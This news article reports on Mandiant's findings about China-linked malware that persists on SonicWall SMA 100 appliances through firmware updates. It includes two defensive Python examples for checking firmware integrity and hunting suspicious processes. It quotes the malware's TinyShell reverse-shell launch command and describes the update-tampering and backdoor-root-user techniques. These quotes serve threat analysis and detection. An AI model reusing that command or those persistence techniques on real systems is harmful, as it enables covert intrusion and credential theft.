Researchers have discovered that threat actors linked to the Chinese government are using malware to infect SonicWall’s Secure Mobile Access 100, a popular security appliance; the malware remains active even after firmware updates.
The Secure Mobile Access 100 is a highly sought-after device for businesses looking to deploy remote workforces. It provides granular access controls to remote users, VPN connections to organizational networks, and the ability to set unique profiles for each employee. Due to the access it provides to customer networks, the SMA 100 is an attractive target for hackers.
Last year, the SMA 100 was targeted by highly skilled hackers who took advantage of a zero-day vulnerability. Unfortunately, this is not the first time security appliances have been compromised in recent years, with Fortinet and Pulse Secure also falling victim to similar attacks.
Malware gaining persistence
A new report published on Thursday by cybersecurity firm Mandiant has revealed that threat actors, believed to have links to China, are currently executing a targeted campaign to establish long-term persistence by deploying malware on unpatched SonicWall SMA appliances. The campaign has caught the attention of security experts due to the malware’s ability to remain active on the devices even after the firmware has been updated.
“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”
In order to maintain its hold on a compromised device, the malicious software implements a clever tactic. The malware constantly scans for new firmware updates, conducting checks every 10 seconds. If an update is detected, the malware springs into action: it makes a backup copy of the archived file, extracts the contents, and then proceeds to copy over its own nefarious files. The malware even adds a backdoor root user to the system, ensuring future access. Finally, the malware rearchives the file, preparing it for installation.
“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers added.
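The update-tampering routine described above has a straightforward defensive counterpart: validate an update image before it is applied. The Python below is an added example written for this article, not SonicWall's or Mandiant's code; the archive layout, file names, contents and the "published digest" are constructed placeholders. It rejects an image when its digest differs from the one published with the release (a re-archived image never reproduces the original bytes), when the archive carries members outside the release manifest, or when its passwd file grants UID 0 to an account other than root, which is the backdoor root user the report describes.

```python
import hashlib
import io
import tarfile

# Constructed firmware image members for this example. This is NOT the real
# SMA 100 image layout; paths and contents are placeholders.
CLEAN_MEMBERS = {
    "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"
                  b"admin:x:1000:1000::/home/admin:/bin/sh\n",
    "bin/httpd": b"\x7fELF-placeholder-httpd",
    "etc/init.d/network": b"#!/bin/sh\n# placeholder init script\n",
}


def build_archive(members):
    """Pack {path: bytes} into an in-memory tar (stand-in for an update file).

    Plain tar (no gzip) is used so the bytes are deterministic for a given
    member set; TarInfo defaults (mtime 0, uid/gid 0) keep it reproducible.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, data in sorted(members.items()):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def extra_root_accounts(passwd_text):
    """Return account names other than 'root' whose UID field is 0."""
    extra = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            extra.append(fields[0])
    return extra


def verify_firmware_archive(archive, expected_sha256, expected_members):
    """Check an update image before it is applied.

    Three independent signals; any one of them is enough to reject the image:
      1. the archive digest differs from the digest published with the release,
      2. the member list contains paths that are not part of the release, or
      3. the bundled passwd grants UID 0 to an account other than root.
    """
    report = {
        "hash_ok": sha256_hex(archive) == expected_sha256,
        "unexpected_members": [],
        "extra_root_accounts": [],
    }
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        names = tar.getnames()
        report["unexpected_members"] = sorted(set(names) - set(expected_members))
        if "etc/passwd" in names:
            passwd = tar.extractfile("etc/passwd").read().decode()
            report["extra_root_accounts"] = extra_root_accounts(passwd)
    report["ok"] = (
        report["hash_ok"]
        and not report["unexpected_members"]
        and not report["extra_root_accounts"]
    )
    return report


if __name__ == "__main__":
    # Constructed scenario: the clean image with its own digest passes.
    clean = build_archive(CLEAN_MEMBERS)
    published_digest = sha256_hex(clean)   # stands in for a vendor-published hash
    print(verify_firmware_archive(clean, published_digest, CLEAN_MEMBERS))
```

In practice the expected digest and member manifest come from the vendor's release notes or a signed manifest, not from the image itself; the check is only as strong as the out-of-band source of those values, and the digest comparison should run before the archive is extracted anywhere the update process can read it.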
An attack campaign in 2021 utilized 16 malware families to infiltrate Pulse Secure devices. This campaign displayed persistence techniques, indicating a sophisticated and well-planned operation. Mandiant has attributed these attacks to several threat groups, including UNC2630 and UNC2717. These groups are aligned with “key Chinese government priorities,” but it’s unclear whether the Chinese government is directly involved in the attacks.
Mandiant is now tracking those responsible for the ongoing attacks against SonicWall SMA 100 customers as UNC4540.
“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” the researchers added in Thursday’s report.
Gaining privileges
The malware’s primary objective seems to be the pilfering of cryptographically hashed passwords for all users who are currently logged into their systems. In addition to this, the malicious software also provides the threat actor with a web shell, which they can leverage to install fresh malware onto the infected device.
“Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.”

The main malware entry point is a bash script named firewalld, which executes its primary loop once for a count of every file on the system squared:

…for j in $(ls / -R) do for i in $(ls / -R) do: …

The script is responsible for executing an SQL command to accomplish credential stealing and execution of the other components. The first function in firewalld executes the TinyShell backdoor httpsd with the command

nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &

if the httpsd process isn’t already running. This sets TinyShell to reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hard coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind shell mode available.
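A hunt over a process listing for the indicators quoted above, as an added example that is not from the article, Mandiant or SonicWall. The process lines are constructed, not captured from a real appliance; the hard-coded IP address is not on the page, so the check keys only on what the quoted command line shows: a binary named httpsd, the -m/-d timing flags and port 51432, plus a shell interpreter running a script named firewalld (the assumption that a legitimate firewalld would not be a bash script is mine).

```python
import shlex

# Constructed process listing in the shape of `ps -eo pid,user,args`. NOT a
# capture from a real SMA appliance. The httpsd line reproduces the TinyShell
# launch command quoted in Mandiant's report; the rest is benign filler.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  412 root     /usr/sbin/sshd -D
  733 root     /bin/httpsd -c -d 5 -m -1 -p 51432
  740 root     /bin/bash /firewalld
  901 nobody   /usr/sbin/httpd -k start
"""

# Port taken from the command line quoted in the report.
TINYSHELL_PORT = "51432"


def parse_ps(text):
    """Return (pid, user, argv) tuples from ps-style output, skipping the header."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue
        pid, user, cmd = parts
        rows.append((int(pid), user, shlex.split(cmd)))
    return rows


def classify(argv):
    """Return the reasons a process matches the reported tooling, or [] if none."""
    reasons = []
    if not argv:
        return reasons
    exe = argv[0].rsplit("/", 1)[-1]

    if exe == "httpsd":
        reasons.append("binary named httpsd (TinyShell variant name from the report)")
        if "-p" in argv:
            i = argv.index("-p")
            if argv[i + 1 : i + 2] == [TINYSHELL_PORT]:
                reasons.append("TinyShell port 51432 in arguments")
        if "-m" in argv or "-d" in argv:
            reasons.append("TinyShell timing/beacon flags (-m / -d) present")

    # Assumption: firewalld on this appliance should never be a shell script
    # run through bash or sh; the report describes the loader as exactly that.
    if exe in ("bash", "sh") and len(argv) > 1:
        if argv[1].rsplit("/", 1)[-1] == "firewalld":
            reasons.append("shell interpreter running a script named firewalld")
    return reasons


def hunt(ps_text):
    """Run classify over a listing; return [(pid, user, cmdline, reasons)] for hits."""
    hits = []
    for pid, user, argv in parse_ps(ps_text):
        reasons = classify(argv)
        if reasons:
            hits.append((pid, user, " ".join(argv), reasons))
    return hits


if __name__ == "__main__":
    for pid, user, cmdline, reasons in hunt(SAMPLE_PS):
        print(f"[{pid}] {user}: {cmdline}")
        for r in reasons:
            print("    -", r)
```

Because the report notes the binary also has a bind-shell mode and falls back to an embedded address when none is given, a listing that shows httpsd without -p 51432 still deserves a look; the process-name match alone is reported as a reason for that case.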
According to researchers, the source of the initial infection remains a mystery. SonicWall issued a notice last week recommending that SMA 100 users upgrade to version 10.2.1.7 or newer.
These updated versions offer valuable features, such as File Integrity Monitoring and anomalous process identification, which could help detect and prevent further breaches.
The patch is readily available for download on SonicWall’s website. Additionally, users are advised to monitor system logs frequently for any signs of abnormal activity, such as unusual login attempts or unexpected internal network traffic. By staying vigilant, users can take proactive steps to protect their systems and data from potential cyber-attacks.